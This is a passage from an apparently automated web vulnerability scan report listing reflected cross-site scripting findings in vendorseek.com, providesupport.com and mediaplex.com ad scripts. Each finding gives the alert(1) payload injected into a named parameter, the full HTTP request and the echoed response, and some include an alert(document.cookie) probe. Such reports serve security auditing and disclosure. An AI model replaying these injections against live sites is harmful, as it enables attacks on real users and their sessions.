m/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac565"><script>alert(1)</script>dea5f51ae06&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc2
...[SNIP]...

3.23. http://forms.vendorseek.com/controller [tnum parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the tnum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d36"><script>alert(1)</script>fe8c1812c3f was submitted in the tnum parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1f9d36"><script>alert(1)</script>fe8c1812c3f&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:47:42 GMT
Connection: close
Set-Cookie: JSESSIONID=E3A83D033E10CFEBA392E0FA7676C378.app5-all2; Path=/
Set-Cookie: JSESSIONID=06A32FAF8D27AB0386D035C9A1780816.app5-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:42 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033262343; Expires=Sat, 16-Feb-2019 12:47:42 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
<Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1f9d36"><script>alert(1)</script>fe8c1812c3f&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendor
...[SNIP]...

3.24. http://forms.vendorseek.com/controller [typage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the typage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808"><script>alert(1)</script>8d9dbcd0750 was submitted in the typage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.aspee808"><script>alert(1)</script>8d9dbcd0750&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:01 GMT
Connection: close
Set-Cookie: JSESSIONID=6EE8FB9F2EFB6D605779F75A84C1C898.app5-all2; Path=/
Set-Cookie: JSESSIONID=16FA8362C193617FAA60E643F730515A.app5-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:01 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033281364; Expires=Sat, 16-Feb-2019 12:48:01 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
reet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.aspee808"><script>alert(1)</script>8d9dbcd0750&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw5
...[SNIP]...

3.25. http://forms.vendorseek.com/controller [vkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the vkey request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57229"><script>alert(1)</script>143b0a15cd4 was submitted in the vkey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=57229"><script>alert(1)</script>143b0a15cd4&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:00 GMT
Connection: close
Set-Cookie: JSESSIONID=23A3EF2447CE3E44D7A9C9D624F699E7.app5-all1; Path=/
Set-Cookie: JSESSIONID=E77003C1A4071CC4D9B5561B5C808894.app5-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:00 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033280128; Expires=Sat, 16-Feb-2019 12:48:00 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
alLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=57229"><script>alert(1)</script>143b0a15cd4&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=200997912
...[SNIP]...

3.26. http://image.providesupport.com/cmd/virtacore [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/virtacore

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a74f<script>alert(1)</script>ffd953b27d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmd6a74f<script>alert(1)</script>ffd953b27d2/virtacore?ps_t=1297999351117&ps_l=http%3A//www.powervps.com/&ps_r=&ps_s=EnEadSGx2lPF HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.powervps.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=EnEadSGx2lPF

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 18 Feb 2011 03:22:09 GMT
Content-Length: 534

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmd6a74f<script>alert(1)</script>ffd953b27d2/virtacore?ps_t=1297999351117&ps_l=http://www.powervps.com/&ps_r=&ps_s=EnEadSGx2lPF
</pre>
<!
...[SNIP]...

3.27. http://image.providesupport.com/js/virtacore/safe-monitor.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/virtacore/safe-monitor.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5d61<script>alert(1)</script>246a70dc7ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsc5d61<script>alert(1)</script>246a70dc7ef/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999351024 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.powervps.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 18 Feb 2011 03:22:07 GMT
Content-Length: 569

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsc5d61<script>alert(1)</script>246a70dc7ef/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999351024
</pre>
<!-- ==========================
...[SNIP]...

3.28. http://image.providesupport.com/js/virtacore/safe-monitor.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/virtacore/safe-monitor.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da0c0<a>e1423a3f174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/virtacoreda0c0<a>e1423a3f174/safe-monitor.js?ps_h=581W&ps_t=1297999466909 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.powervps.com/cpanel-plesk-vps.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=EnEadSGx2lPF

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 18 Feb 2011 03:24:04 GMT
Content-Length: 547

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/virtacoreda0c0<a>e1423a3f174/safe-monitor.js?ps_h=581W&ps_t=1297999466909
</pre>
<!-- ================================================
...[SNIP]...

3.29. http://img.mediaplex.com/content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d142"%3balert(1)//eee3dea5e8d was submitted in the mpck parameter. This input was echoed as 3d142";alert(1)//eee3dea5e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-2%3Fmpt%3D%25r3d142"%3balert(1)//eee3dea5e8d&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141134;x=1793;c=203681169,203681169;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:27:21 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:25 GMT
ETag: "5bff41-bfd-49ab3f6116040"
Accept-Ranges: bytes
Content-Length: 7177
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
</script>d97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k=http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-2?mpt=%r3d142";alert(1)//eee3dea5e8d\" target=\"_blank\">
...[SNIP]...

3.30. http://img.mediaplex.com/content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af630"%3balert(1)//5d7a8e72841 was submitted in the mpvc parameter. This input was echoed as af630";alert(1)//5d7a8e72841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-2%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141134;x=1793;c=203681169,203681169;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k=af630"%3balert(1)//5d7a8e72841 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:27:24 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:25 GMT
ETag: "5bff41-bfd-49ab3f6116040"
Accept-Ranges: bytes
Content-Length: 7153
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
</script>d97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k=af630";alert(1)//5d7a8e72841http://altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-2%3Fmpt%3D%25r&clickTag=http://o1.qnsr.com//cgi/c?a=20141134;x=1793;c=203681169,203681169;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/abou
...[SNIP]...

3.31. http://img.mediaplex.com/content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e55af"%3balert(1)//56a40f07ee4 was submitted in the mpck parameter. This input was echoed as e55af";alert(1)//56a40f07ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-1%3Fmpt%3D%25re55af"%3balert(1)//56a40f07ee4&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:08 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:16 GMT
ETag: "3b3dad-bfd-49ab3f5880c00"
Accept-Ranges: bytes
Content-Length: 6150
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
m//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k=http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-1?mpt=%re55af";alert(1)//56a40f07ee4\" target=\"_blank\">
...[SNIP]...

3.32. http://img.mediaplex.com/content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c132"%3balert(1)//d6444155405 was submitted in the mpvc parameter. This input was echoed as 9c132";alert(1)//d6444155405 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-1%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k=9c132"%3balert(1)//d6444155405 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:27 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:16 GMT
ETag: "3b3dad-bfd-49ab3f5880c00"
Accept-Ranges: bytes
Content-Length: 6126
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k=9c132";alert(1)//d6444155405http://altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-1%3Fmpt%3D%25r&clickTag=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=
...[SNIP]...

3.33. http://img.mediaplex.com/content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8f7"%3balert(1)//b499e39d0ce was submitted in the mpck parameter. This input was echoed as 1f8f7";alert(1)//b499e39d0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-0%3Fmpt%3D%25r1f8f7"%3balert(1)//b499e39d0ce&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:24 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:06 GMT
ETag: "3b3daa-bf5-49ab3f4ef7580"
Accept-Ranges: bytes
Content-Length: 6142
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
m//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k=http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-0?mpt=%r1f8f7";alert(1)//b499e39d0ce\" target=\"_blank\">
...[SNIP]...

3.34. http://img.mediaplex.com/content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
